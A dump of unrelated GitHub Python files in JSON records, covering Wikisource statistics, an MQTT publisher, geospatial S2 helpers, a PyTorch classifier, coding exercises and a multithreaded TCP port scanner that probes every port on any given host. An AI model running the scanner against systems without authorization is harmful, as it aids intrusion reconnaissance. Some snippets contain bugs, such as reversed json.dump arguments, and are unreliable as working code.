open(\"Stats.json\", \"r\") as f: # Open the JSON file for reading\n data = json.load(f) # Read the JSON into the buffer\n\n ## Working with buffered content\n data[domain][\"Num_of_pages\"] = num_allpages\n data[domain][\"Without_text\"] = num_q0\n data[domain][\"Not_proofread\"] = num_q1\n data[domain][\"Problematic\"] = num_q2\n data[domain][\"Proofread\"] = num_q3q4\n data[domain][\"Validated\"] = num_q4\n data[domain][\"Main_Pages\"] = num_main_allpages\n data[domain][\"Main_WithScan\"] = main_withscan\n data[domain][\"Main_WithOutScan\"] = main_withoutscan\n data[domain][\"Main_APS\"] = main_apg\n data[domain][\"Page_APS\"] = page_aps\n\n # Save our changes to JSON file\n with open(\"Stats.json\", \"w+\") as f:\n json.dump( f, data, indent= True)\n\nfor domain in domains:\n dbname = domain + 'wikisource_p'\n\n conn = toolforge.connect( dbname )\n cur = conn.cursor()\n\n pageNsCode = siteData[domain]['namespace']['page']\n\n # Get all page in Page namespace\n num_allpages = \"select count(page_id) as number from page where page_namespace=%s and page_is_redirect=0\" % pageNsCode\n cur.execute( num_allpages )\n row = cur.fetchone()\n num_allpages = int(row[0])\n\n # Get Q0\n cur.execute( doCatQueery( siteData[domain]['category']['Without_text'], pageNsCode) )\n row = cur.fetchone()\n num_q0 = int(row[0])\n\n # Get Q1\n cur.execute( doCatQueery( siteData[domain]['category']['Not_proofread'], pageNsCode) )\n row = cur.fetchone()\n num_q1 = int(row[0])\n\n # Get Q2\n cur.execute( doCatQueery( siteData[domain]['category']['Problematic'], pageNsCode) )\n row = cur.fetchone()\n num_q2 = int(row[0])\n\n # Get Q3\n cur.execute( doCatQueery( siteData[domain]['category']['Proofread'], pageNsCode) )\n row = cur.fetchone()\n num_q3 = int(row[0])\n\n # Get Q4\n cur.execute( doCatQueery( siteData[domain]['category']['Validated'], pageNsCode) )\n row = cur.fetchone()\n num_q4 = int(row[0])\n\n # Get main namespace's total pages\n num_main_allpages = \"select count(distinct page_id) from page where page_namespace=0 and page_is_redirect=0;\"\n cur.execute( num_main_allpages )\n row = cur.fetchone()\n num_main_allpages = int(row[0])\n\n # Get main namespace's with scan\n main_withscan = \"select count(distinct tl_from) as num from templatelinks left join page on page_id=tl_from where tl_namespace=%d and page_namespace=0;\"%pageNsCode\n cur.execute( main_withscan )\n row = cur.fetchone()\n main_withscan = int(row[0])\n\n #Get Disambiguation pages\n q_disamb = \"select count(page_title) from page where page_namespace = 0 and page_is_redirect = 0 and page_id in (select pp_page from page_props where pp_propname = 'disambiguation')\"\n cur.execute(q_disamb)\n row = cur.fetchone ()\n num_disambig = int(row[0])\n\n # Get main namespace's without scan\n main_withoutscan = num_main_allpages - main_withscan - num_disambig\n\n # Get Average Page Size\n main_apg = \"select avg(page_len) from page where page_namespace = 0;\"\n cur.execute(main_apg)\n row = cur.fetchone()\n main_apg = int(row[0])\n\n page_aps = \"select avg(page_len) from page where page_namespace = %d;\" % pageNsCode\n cur.execute(page_aps)\n row = cur.fetchone()\n page_aps = int(row[0])\n\n updateJson(domain, num_allpages, num_q0, num_q1, num_q2, num_q3 + num_q4, num_q4, num_main_allpages,\n main_withscan, main_withoutscan, main_apg, page_aps)\n\n cur.close ()\n conn.close ()\n\n# timestamp\nwith open(\"Stats.json\", \"r\") as f: # Open the JSON file for reading\n data = json.load(f) # Read the JSON into the buffer\n\ndata[\"timestamp\"] = datetime.datetime.now().strftime(\"%A, %d. %B %Y %I:%M%p\")\n\nwith open(\"Stats.json\", \"w\") as f:\n json.dump( f, data, sort_keys=True, indent= True)","repo_name":"indictechcom/indic-wsstats","sub_path":"gen_stats.py","file_name":"gen_stats.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9422454996","text":"# pip install paho-mqtt\n\nimport paho.mqtt.client as mqtt\nimport time\nimport json\nimport random\n\n# *********************************************************************\n# MQTT Config\n\ndataChnId1 = \"Temperature\"\ndataChnId2 = \"Humidity\"\nMQTT_SERVER = \"52.206.47.47\"\nMQTT_PORT = 1883\nMQTT_ALIVE = 60\nMQTT_TOPIC1 = \"mosquitto/\" + dataChnId1\nMQTT_TOPIC2 = \"mosquitto/\" + dataChnId2\n\n# *********************************************************************\n\nmqtt_client = mqtt.Client()\nmqtt_client.connect(MQTT_SERVER, MQTT_PORT, MQTT_ALIVE)\t\n\nwhile True:\n h0 = random.randint(0,30)\n t0 = random.randint(0,30)\n payload = {\"dataChnId\":dataChnId1,\"value\":t0}\n print(dataChnId1 + \" : \" + str(t0))\n mqtt_client.publish(MQTT_TOPIC1, json.dumps(payload), qos=1)\n payload = {\"dataChnId\":dataChnId2,\"value\":h0}\n print(dataChnId2 + \" : \" + str(h0))\n mqtt_client.publish(MQTT_TOPIC2, json.dumps(payload), qos=1)\n time.sleep(10)","repo_name":"ArcherHuang/Data-Visualization","sub_path":"Code/Python3/mosquitto_mqtt.py","file_name":"mosquitto_mqtt.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72931626681","text":"import socket\nimport argparse\nfrom tqdm import tqdm\nimport concurrent.futures\nimport art\nimport ipaddress\nimport sys\n\n\n#清理掉http和https\ndef clean_url(url):\n if url.startswith(\"http://\"):\n url = url[7:]\n elif url.startswith(\"https://\"):\n url = url[8:]\n return url\n\ndef get_ip_address(url):\n try:\n ip = ipaddress.ip_address(url)\n return str(ip)\n except ValueError:\n try:\n ip_address = socket.gethostbyname(url)\n return ip_address\n except socket.gaierror:\n print(f\"无法解析主机名:{url}\")\n sys.exit(1)\n\n\n# 扫描单个端口的函数\ndef scan_port(ip_address,port):\n try:\n with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:\n s.settimeout(1)\n result = s.connect_ex((ip_address,port))\n if result == 0:\n return port\n except socket.error:\n pass\n return None\ndef scan_ports(ip_address, num_threads, min_port, max_port):\n open_ports = []\n ports_to_scan = range(min_port, max_port + 1)\n with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:\n futures = [executor.submit(scan_port, ip_address, port) for port in ports_to_scan]\n with tqdm(total=len(ports_to_scan), desc=\"扫描端口\") as bar:\n for i, future in enumerate(concurrent.futures.as_completed(futures)):\n result = future.result()\n if result is not None:\n open_ports.append(result)\n bar.update(1)\n return open_ports\n\n# 获得端口对应的服务器名称的函数\n\ndef get_service_name(port):\n try:\n service_name = socket.getservbyport(port)\n return service_name\n except OSError:\n return \"UNKnown\"\n\ndef print_ascii_art():\n ascii_art = art.text2art(\"Zero URLscanner\")\n print(ascii_art)\n\nif __name__ == \"__main__\":\n\n print_ascii_art()\n\n print(\"欢迎来到Zero老师写的第一个URlscanner工具\")\n print(\"-----------------------------------------------------------\")\n print(\"请你享用\")\n print(\"-----------------------------------------------------------\")\n print('输入-h获得提示')\n parser = argparse.ArgumentParser(description=\"Zero URLscanner - 作者:zzm\")\n parser.add_argument(\"-u\",\"--url\",required=True,help=\"要扫描单个ip或者URl\")\n parser.add_argument(\"-t\",\"--threads\",type=int,default=4,help=\"线程数(不超过700)\")\n parser.add_argument(\"-min\",type=int,default=1,help=\"开始扫描端口\")\n parser.add_argument(\"-max\",type=int,default=65537,help='截止的端口号')\n args = parser.parse_args()\n\n\n# 限制线程不超过700\n num_threads = min(args.threads,700)\n url = args.url\n url = clean_url(url)\n host_name = url.split('/')[0]\n ip_address = get_ip_address(host_name)\n print(f\"{host_name}的ip地址:{ip_address}\")\n\n open_ports = scan_ports(ip_address, num_threads, args.min, args.max)\n print(f\"\\n{host_name} ({ip_address}) 的开放端口:\")\n if open_ports:\n for port in open_ports:\n service_name = get_service_name(port)\n print(f\"端口 {port} ({service_name}) 是开放的\")\n else:\n print('没有找到开放的端口')\n\n\n\n","repo_name":"tlpzzm/URLscanner","sub_path":"URLscanner.py","file_name":"URLscanner.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"6187033201","text":"\"\"\"Utilities for reading and writing objects to/from Google Cloud.\"\"\"\nfrom io import BytesIO\n\nfrom google.cloud import storage\n\nimport pydicom\n\n\ndef read_dataset_from_blob(\n bucket: storage.Bucket,\n blob_name: str,\n stop_before_pixels: bool = False,\n) -> pydicom.Dataset:\n \"\"\"Read a pydicom Dataset from a bucket.\n\n Parameters\n ----------\n bucket: storage.Bucket\n Bucket object where the blob is stored.\n blob_name: str\n Name of the blob within the bucket.\n stop_before_pixels: bool\n Whether to stop before reading in the pixel data. I.e. return metadata\n only.\n\n Returns\n -------\n pydicom.Dataset\n Dataset loaded from the specified blob.\n\n \"\"\"\n blob = bucket.get_blob(blob_name)\n dcm_bytes = blob.download_as_bytes()\n dcm = pydicom.dcmread(\n BytesIO(dcm_bytes),\n stop_before_pixels=stop_before_pixels,\n )\n return dcm\n\n\ndef write_dataset_to_blob(\n dataset: pydicom.Dataset,\n bucket: storage.Bucket,\n blob_name: str\n) -> None:\n \"\"\"Write a pydicom Dataset to a bucket.\n\n Parameters\n ----------\n dataset: pydicom.Dataset\n Dataset object to upload.\n bucket: storage.Bucket\n Bucket object where the blob should be stored.\n blob_name: str\n Name of the blob within the bucket. If it already exists, it will be\n overwritten.\n\n \"\"\"\n blob = bucket.blob(blob_name)\n with BytesIO() as buf:\n dataset.save_as(buf)\n buf.seek(0)\n blob.upload_from_file(buf)\n","repo_name":"ImagingDataCommons/idc-pan-cancer-annotations-conversion","sub_path":"src/idc_annotation_conversion/cloud_io.py","file_name":"cloud_io.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"693603977","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\narr = [int(sys.stdin.readline().rstrip()) for _ in range(n)]\n\narr1 = [0]*n\nresult = [0]*n\n\nfor i in arr:\n arr1[i] += 1\n\nfor i in range(1, len(arr1)):\n arr1[i] += arr1[i-1]\n\nfor i in arr:\n result[arr1[i]-1] = i\n arr1[i] -= 1\n\nfor i in result:\n print(i)\n","repo_name":"PKL-2022/KTY_Algorithm","sub_path":"Algorithmstudy/11.정렬/10989 (수 정렬하기3).py","file_name":"10989 (수 정렬하기3).py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7495634813","text":"TC = int(input())\n\ndef func(cx, cy, r):\n global cnt\n # 출발점과 도착점이 원 안에 있는 경우 count\n # (x-a)^2 + (y-b)^2 < r**2\n if (x1 - cx) ** 2 + (y1 - cy) ** 2 < r ** 2:\n cnt += 1\n if (x2 - cx) ** 2 + (y2 - cy) ** 2 < r ** 2:\n cnt += 1\n\n # 출발점과 도착점이 같은 원 안에 있을 경우 -2\n # ex) 돼지코 모양: 큰 원 안에 작은 원 2개가 있고,\n # 출발점과 도착점이 각각 작은 원 안에 있는 경우,\n # 큰 원의 개수 * 2 만큼 빼주기\n if (x1 - cx) ** 2 + (y1 - cy) ** 2 <= r ** 2 and (x2 - cx) ** 2 + (y2 - cy) ** 2 <= r ** 2:\n cnt -= 2\n return cnt\n\nfor tc in range(1, TC+1):\n # 출발점과 도착점\n x1, y1, x2, y2 = map(int, input().split())\n n = int(input()) # 원의 개수\n cnt = 0\n\n for i in range(n):\n # 원의 모양\n cx, cy, r = map(int, input().split())\n func(cx, cy, r)\n print(cnt)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YooKyungHun/Algorithm","sub_path":"ALGORITHM/Python/1004어린왕자.py","file_name":"1004어린왕자.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72777234681","text":"from kivy.app import App\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\n# from kivy.uix.boxlayout import BoxLayout\n# from kivy.uix.button import Button\n\n\nclass GradeCalculator(App):\n\n def build(self):\n Window.size = (500, 500)\n self.title = \"Grade Calculator\"\n self.root = Builder.load_file('grade_calculator.kv')\n return self.root\n\n def handle_grade_score(self):\n score = self.root.ids.text_input.text\n try:\n score = int(score)\n grade = self.calculate_grade(score)\n self.root.ids.output_display.text = grade\n except ValueError:\n self.root.ids.output_display.text = 'Enter an integer'\n\n def calculate_grade(self, score):\n if score >= 85:\n grade = 'High Distinction'\n elif score >= 75:\n grade = 'Distinction'\n elif score >= 65:\n grade = 'Credit'\n elif score >= 50:\n grade = 'Pass'\n else:\n grade = 'Fail'\n return grade\n\n\n# Create instance of GradeCalculator and run() it\nGradeCalculator().run()\n","repo_name":"Davvott/CP1404","sub_path":"prac_07/Grade_calculator.py","file_name":"Grade_calculator.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43499996239","text":"# bs4\n# https://www.readnovel.com/rank/hotsales?pageNum=1\nimport requests\nfrom bs4 import BeautifulSoup\n\nx_url = 'https://www.readnovel.com/rank/hotsales?'\n\nparmas ={\n 'pageNum' : 1\n}\n\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n\n}\nresponse = requests.get(x_url,headers=header,params=parmas)\nprint(response.status_code)\n# with open('page.html','w') as file:\n# file.write(response.text)\nif response.status_code == 200:\n soup = BeautifulSoup(response.text)\n print(soup.prettify())","repo_name":"XUANXUANXU/6-web-crawler","sub_path":"07-day/xiaoshuowang.py","file_name":"xiaoshuowang.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9964081033","text":"import RPi.GPIO as gpio\ngpio.setmode(gpio.BOARD)\ngpio.setwarnings(0)\ndta=[3,5,7,8]\nfor i in range (0,4):\n gpio.setup(dta[i],gpio.IN)\nwhile(1):\n a=gpio.input(3)\n b=gpio.input(5)<<1\n c=gpio.input(7)<<2\n d=gpio.input(8)<<3\n x=a+b+c+d\n if(x==1):\n print('1')\n if(x==2):\n print('2')\n if(x==3):\n print('3')\n if(x==4):\n print('4')\n if(x==5):\n print('5')\n if(x==6):\n print('6')\n if(x==7):\n print('7')\n if(x==8):\n print('8')\n if(x==9):\n print('9')\n if(x==11):\n print('*')\n if(x==10):\n print('0')\n if(x==12):\n print('#')\n \n","repo_name":"adityahimanshusharma/Codes","sub_path":"Python/Hardware/DTMF_pi.py","file_name":"DTMF_pi.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21286387960","text":"soma_idade = maior = menor = mulheres_menores = 0\nnome_mais_velho = ''\nopcao = ''\nwhile opcao != 'N':\n for p in range(1, 5):\n print(f'¬¬¬¬¬¬ {p}ª pessoa ¬¬¬¬¬¬¬')\n nome = str(input('Nome? ')).strip()\n idade = int(input('Idade? '))\n sexo = str(input('Sexo? [M/F] ')).strip()\n soma_idade += idade\n if sexo in 'fF' and idade < 20:\n mulheres_menores += 1\n if p == 1 and sexo in 'Mm':\n maior = idade\n menor = idade\n else:\n if idade > maior and sexo in 'Mm':\n maior = idade\n nome_mais_velho = nome\n if idade < menor:\n menor = idade\n opcao = str(input('Deseja continuar? [S/N] ')).upper()\nprint(f'A média de idade do grupo é de {soma_idade / 4}')\nprint(f'No total são {mulheres_menores} mulheres com menos de 20 anos')\nprint(f'O mais velho tem {maior} anos e seu nome é {nome_mais_velho}')\n","repo_name":"fewatts/Exerc-cios_py_SQl_C","sub_path":"Python/pythonProjectrevisaoPy/Ex56(analisador completo).py","file_name":"Ex56(analisador completo).py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13376663448","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('following//', FollowingList.as_view(), name='following-list'),\n path('followers//', FollowersList.as_view(), name='follower-list'),\n path('follow//', FollowDetail.as_view(), name='follow-detail'),\n path('requests_received//', RequestListReceived.as_view(), name='request-list'),\n path('requests_sent//', RequestListSent.as_view(), name='request-list'),\n path('request//', RequestDetail.as_view(), name='request-detail'),\n path('friends//', FriendList.as_view(), name='request-detail'),\n path(\"follow/\", FollowPost.as_view(), name=\"follow-post\"),\n \n]","repo_name":"CMPUT404W23-OG/CMPUT404-project-socialdistribution","sub_path":"backend/follow/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73003120441","text":"from typing import *\n\nimport torch\nimport torch.nn as nn\nfrom fairseq.modules import TransformerSentenceEncoder\nfrom torch import Tensor\nfrom torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence\n\nfrom fidameval.utils import DEVICE, Config, unpad_sequence\n\n\nclass ModelConfig(Config):\n encoder: str\n vocab_size: int\n nhid: int\n emb_dim: int\n is_binary: bool = True\n pad_idx: Optional[int] = None\n mask_idx: Optional[int] = None\n one_hot_embedding: bool = True\n num_layers: int = 1\n num_heads: int = 1\n learned_pos_embedding: bool = True\n non_linear_decoder: bool = False\n\n\nclass LanguageClassifier(nn.Module):\n def __init__(self, config: ModelConfig):\n super().__init__()\n\n self.vocab_size = config.vocab_size\n self.is_binary = config.is_binary\n self.pad_idx = config.pad_idx\n self.mask_idx = config.mask_idx\n self.one_hot_embedding = config.one_hot_embedding\n self.num_layers = config.num_layers\n self.num_heads = config.num_heads\n self.non_linear_decoder = config.non_linear_decoder\n\n if config.encoder == \"lstm\":\n self.emb_dim = config.emb_dim\n self.positional_embeddings = None\n self.nhid = config.nhid\n\n self.embeddings = nn.Embedding(self.vocab_size, self.emb_dim)\n self.encoder = nn.LSTM(\n self.emb_dim, self.nhid, self.num_layers, batch_first=True\n )\n elif config.encoder == \"transformer\":\n self.emb_dim = config.emb_dim * config.num_heads\n self.nhid = self.emb_dim\n\n self.embeddings = nn.Embedding(self.vocab_size, self.emb_dim)\n self.encoder = TransformerSentenceEncoder(\n padding_idx=self.pad_idx,\n vocab_size=self.vocab_size,\n num_encoder_layers=config.num_layers,\n embedding_dim=self.emb_dim,\n ffn_embedding_dim=config.nhid,\n num_attention_heads=config.num_heads,\n dropout=0.0,\n attention_dropout=0.0,\n activation_dropout=0.0,\n learned_pos_embedding=config.learned_pos_embedding,\n )\n self.positional_embeddings = self.encoder.embed_positions # copy?\n self.encoder.embed_positions = None\n else:\n raise ValueError(\"Encoder type must be 'lstm' or 'transformer'\")\n\n if config.non_linear_decoder:\n # Based on BERT imp of fairseq\n non_linear_decoder = nn.Sequential(\n nn.Linear(self.nhid, self.nhid),\n nn.ReLU(),\n nn.LayerNorm(self.nhid),\n )\n self.lm_decoder = nn.Sequential(\n non_linear_decoder, nn.Linear(self.nhid, config.vocab_size)\n )\n self.binary_decoder = nn.Sequential(\n non_linear_decoder, nn.Linear(self.nhid, 1)\n )\n else:\n self.lm_decoder = nn.Linear(self.nhid, config.vocab_size)\n self.binary_decoder = nn.Linear(self.nhid, 1)\n\n self.init_weights()\n self.to(DEVICE)\n\n def init_weights(self):\n initrange = 0.1\n if self.one_hot_embedding:\n max_emb_size = max(self.vocab_size, self.emb_dim)\n self.embeddings.weight.data = torch.eye(max_emb_size)[\n : self.vocab_size, : self.emb_dim\n ]\n self.embeddings.weight.requires_grad = False\n else:\n self.embeddings.weight.data.uniform_(-initrange, initrange)\n\n lm_decoder = self.lm_decoder[-1] if self.non_linear_decoder else self.lm_decoder\n binary_decoder = (\n self.binary_decoder[-1] if self.non_linear_decoder else self.binary_decoder\n )\n\n lm_decoder.bias.data.fill_(1 / self.vocab_size)\n lm_decoder.weight.data.uniform_(-initrange, initrange)\n binary_decoder.weight.data.uniform_(-initrange, initrange)\n\n if self.pad_idx is not None:\n self.embeddings.weight.data[self.pad_idx] = 0.0\n\n def create_inputs_embeds(\n self, input_ids: Tensor, add_positional: bool = True\n ) -> Tensor:\n if input_ids.ndim == 1:\n input_ids = input_ids.unsqueeze(0)\n\n if (self.positional_embeddings is not None) and add_positional:\n return self.embeddings(input_ids) + self.positional_embeddings(input_ids)\n else:\n return self.embeddings(input_ids)\n\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n input_lengths: Optional[Tensor] = None,\n mask_ids: Optional[List[List[int]]] = None,\n return_attention=False,\n return_hidden=False,\n return_hidden_only=False,\n pseudo_ll=False,\n ):\n if inputs_embeds is None and input_ids is None:\n raise ValueError(\"inputs_embeds or input_ids must be provided\")\n if input_ids is not None and input_ids.ndim == 1:\n input_ids = input_ids.unsqueeze(0)\n if inputs_embeds is None:\n inputs_embeds = self.create_inputs_embeds(input_ids.to(DEVICE))\n if inputs_embeds.ndim == 2:\n inputs_embeds = inputs_embeds.unsqueeze(0)\n\n inputs_embeds = inputs_embeds.to(DEVICE)\n\n if isinstance(self.encoder, nn.LSTM):\n if input_lengths is not None:\n inputs_embeds = pack_padded_sequence(\n inputs_embeds, input_lengths, batch_first=True, enforce_sorted=False\n )\n\n hidden, _ = self.encoder(inputs_embeds)\n\n if isinstance(hidden, PackedSequence):\n hidden, _ = pad_packed_sequence(hidden, batch_first=True)\n elif pseudo_ll:\n assert input_ids is not None\n assert self.mask_idx is not None\n hidden = torch.zeros_like(inputs_embeds, device=DEVICE)\n\n for idx in range(inputs_embeds.shape[1]):\n masked_input = input_ids.clone()\n masked_input[:, idx] = self.mask_idx\n masked_embeds = self.create_inputs_embeds(masked_input.to(DEVICE))\n output = self.encoder(\n masked_input,\n token_embeddings=masked_embeds,\n last_state_only=True,\n attn_mask=None,\n )\n hidden[:, idx] = output[0][0].transpose(0, 1)[:, idx]\n else:\n attn_mask = None\n token_proxy = (\n torch.zeros(inputs_embeds.shape[:-1])\n if input_ids is None\n else input_ids\n )\n output = self.encoder(\n token_proxy,\n token_embeddings=inputs_embeds,\n last_state_only=True,\n attn_mask=attn_mask,\n )\n hidden = output[0][0].transpose(0, 1) # T x B x D -> B x T x D\n\n if mask_ids is not None:\n hidden = torch.cat(\n [hidden[idx, mask_idx] for idx, mask_idx in enumerate(mask_ids)]\n )\n\n if return_hidden_only:\n return hidden\n\n if self.is_binary:\n if isinstance(self.encoder, TransformerSentenceEncoder):\n final_hidden = hidden[:, 0, :]\n elif input_lengths is None:\n final_hidden = hidden[:, -1, :]\n else:\n batch_size = hidden.shape[0]\n final_hidden = hidden[range(batch_size), input_lengths - 1]\n\n predictions = self.binary_decoder(final_hidden)\n else:\n predictions = self.lm_decoder(hidden)\n\n if mask_ids is None and input_lengths is not None:\n predictions = unpad_sequence(predictions, lengths=input_lengths)\n\n predictions = predictions.squeeze(1)\n\n if return_attention:\n print(\"Attention maps currently not supported!\")\n\n if return_hidden:\n return predictions, hidden\n\n return predictions\n\n @property\n def num_parameters(self):\n return sum(torch.prod(torch.tensor(x.shape)) for x in self.parameters())\n","repo_name":"jumelet/fidam-eval","sub_path":"fidameval/train/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18353373358","text":"import shapely\nfrom shapely.wkt import loads\nimport s2sphere as s2\nimport geopandas as gpd\n\n\nclass S2Service:\n \"\"\"\n S2 service for utilizing the S2 functionalities\n \"\"\"\n\n @staticmethod\n def get_bounding_box_cell_ids(latitudes, longitudes, resolution_level):\n min_level = resolution_level\n max_level = resolution_level\n r = s2.RegionCoverer()\n r.min_level = min_level\n r.max_level = max_level\n\n lb_lat = min(latitudes)\n ub_lat = max(latitudes)\n lb_lon = min(longitudes)\n ub_lon = max(longitudes)\n\n lb = s2.LatLng.from_degrees(lb_lat, lb_lon)\n ub = s2.LatLng.from_degrees(ub_lat, ub_lon)\n cell_ids = r.get_covering(s2.LatLngRect.from_point_pair(lb, ub))\n return cell_ids\n\n @staticmethod\n def wkt_to_cell_ids(field_wkt, resolution_level, point=False):\n \"\"\"\n fetches cell ids from S2 for the provided wkt field\n \"\"\"\n try:\n poly = loads(field_wkt)\n if point:\n longs, lats = poly.coords.xy\n else:\n longs, lats = poly.exterior.coords.xy\n longs, lats = longs.tolist(), lats.tolist()\n cell_ids = S2Service.get_bounding_box_cell_ids(lats, longs, resolution_level)\n return cell_ids\n except Exception as e:\n raise Exception(e)\n\n\n @staticmethod\n def wkt_to_cell_tokens(field_wkt, resolution_level, point=False):\n \"\"\"\n fetches cell tokens from S2 for the provided wkt field\n \"\"\"\n try:\n s2_cell_ids = S2Service.wkt_to_cell_ids(field_wkt, resolution_level, point=point)\n s2_token_list = []\n for s2_cell_id in s2_cell_ids:\n s2_token_list.append(s2_cell_id.to_token())\n\n return s2_token_list\n except Exception as e:\n raise Exception(e)\n\n @staticmethod\n def get_boundary_coverage(s2_cell_ids, polygon, max_resolution_col_name):\n \"\"\"\n returns lats and longs of the specific s2 cell ids\n \"\"\"\n s2_index__l19_list = []\n p_gdf = gpd.GeoDataFrame()\n idx = 0\n for s2_cell_id in s2_cell_ids:\n s2_cell = s2.Cell(s2_cell_id)\n vertices = []\n for i in range(0, 4):\n vertex = s2_cell.get_vertex(i)\n latlng = s2.LatLng.from_point(vertex)\n vertices.append((latlng.lng().degrees, latlng.lat().degrees))\n geo = shapely.geometry.Polygon(vertices)\n if polygon.intersects(geo):\n s2_index__l19_list.append(s2_cell_id.to_token())\n p_gdf.loc[idx, max_resolution_col_name] = s2_cell_id.to_token()\n p_gdf.loc[idx, 'geometry'] = geo\n idx += 1\n\n p_gdf.reset_index(drop=True, inplace=True)\n return p_gdf\n\n @staticmethod\n def get_cell_token_for_lat_long(lat, long):\n \"\"\"\n Get the S2 cell tokens for the given lat and long\n Fetching Resolution level 13 and 20 tokens\n :param lat:\n :param long:\n :return:\n \"\"\"\n s2_cell_token_13 = s2.Cell.from_lat_lng(s2.LatLng.from_degrees(lat, long)).id().parent(13).to_token()\n s2_cell_token_20 = s2.Cell.from_lat_lng(s2.LatLng.from_degrees(lat, long)).id().parent(20).to_token()\n return s2_cell_token_13, s2_cell_token_20\n\n @staticmethod\n def get_cell_tokens_for_bounding_box(latitudes, longitudes, resolution_level=13):\n \"\"\"\n Fetch the S2 cell tokens for the given Bounding Box\n :param resolution_level:\n :param latitudes:\n :param longitudes:\n :return:\n \"\"\"\n s2_cell_ids = S2Service.get_bounding_box_cell_ids(latitudes, longitudes, resolution_level)\n s2_token_list = []\n for s2_cell_id in s2_cell_ids:\n s2_token_list.append(s2_cell_id.to_token())\n return s2_token_list\n","repo_name":"agstack/asset-registry","sub_path":"s2_service.py","file_name":"s2_service.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"30253185542","text":"from xml.dom import minidom\n\n\ndef main():\n # parse untuk load file xml -> memory\n # dan lakukan parsing\n doc = minidom.parse(\"file.xml\")\n\n # cetak isi doc dg tag pertamanya\n print(doc.nodeName)\n print(doc.firstChild.tagName)\n\n nama = doc.getElementsByTagName(\"nama\")[0].firstChild.data\n alamat = doc.getElementsByTagName(\"alamat\")[0].firstChild.data\n jurusan = doc.getElementsByTagName(\"jurusan\")[0].firstChild.data\n list_hobi = doc.getElementsByTagName(\"hobi\")\n\n print(\"Nama: {}\\nAlamat: {}\\nJurusan: {}\\n\".format(nama, alamat, jurusan))\n\n # bikin element\n hobi_baru = doc.createElement(\"hobi\")\n hobi_baru.setAttribute(\"name\", \"programming\")\n doc.firstChild.appendChild(hobi_baru)\n # load again\n list_hobi = doc.getElementsByTagName(\"hobi\")\n\n print(\"Memiliki {} hobi:\".format(len(list_hobi)))\n\n for hobi in list_hobi:\n print(\"-\", hobi.getAttribute(\"name\"))\n\n # simpan permanen ke dalam file.xml\n file_xml = open(\"file.xml\",\"w\")\n doc.writexml(file_xml)\n file_xml.close()\n\nmain()","repo_name":"SemmiDev/Python-Basic","sub_path":"petanikode/files/XMLParsingWithDOMAPI/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23506046838","text":"from setuptools import setup, find_packages\nfrom setuptools.command.build_py import build_py\nfrom codecs import open\nfrom os import makedirs, path\nfrom shutil import copyfile\n\nhere = path.abspath(path.dirname(__file__))\nname = \"jolt\"\nexec(open(\"jolt/version.py\").read())\n\n\n# Get the long description from the README file\nwith open(path.join(here, \"README.rst\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\ntry:\n with open(path.join(here, \"requirements.txt\"), encoding=\"utf-8\") as f:\n pinned_reqs = f.readlines()\nexcept FileNotFoundError:\n pinned_reqs = []\n\n\nclass BuildCommand(build_py):\n def run(self):\n build_py.run(self)\n\n # Install additional files required by selfdeploy plugin\n if not self.dry_run:\n target_dir = path.join(self.build_lib, name, \"plugins\", \"selfdeploy\")\n makedirs(target_dir, exist_ok=True)\n for fn in [\"setup.py\", \"README.rst\"]:\n copyfile(path.join(here, fn), path.join(target_dir,fn))\n\nsetup(\n name=name,\n cmdclass={\"build_py\": BuildCommand},\n version=__version__,\n python_requires=\">=3.8\",\n description=\"A task executor\",\n long_description=long_description,\n url=\"https://github.com/srand/jolt\",\n author=\"Robert Andersson\",\n author_email=\"srand@github.com\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience 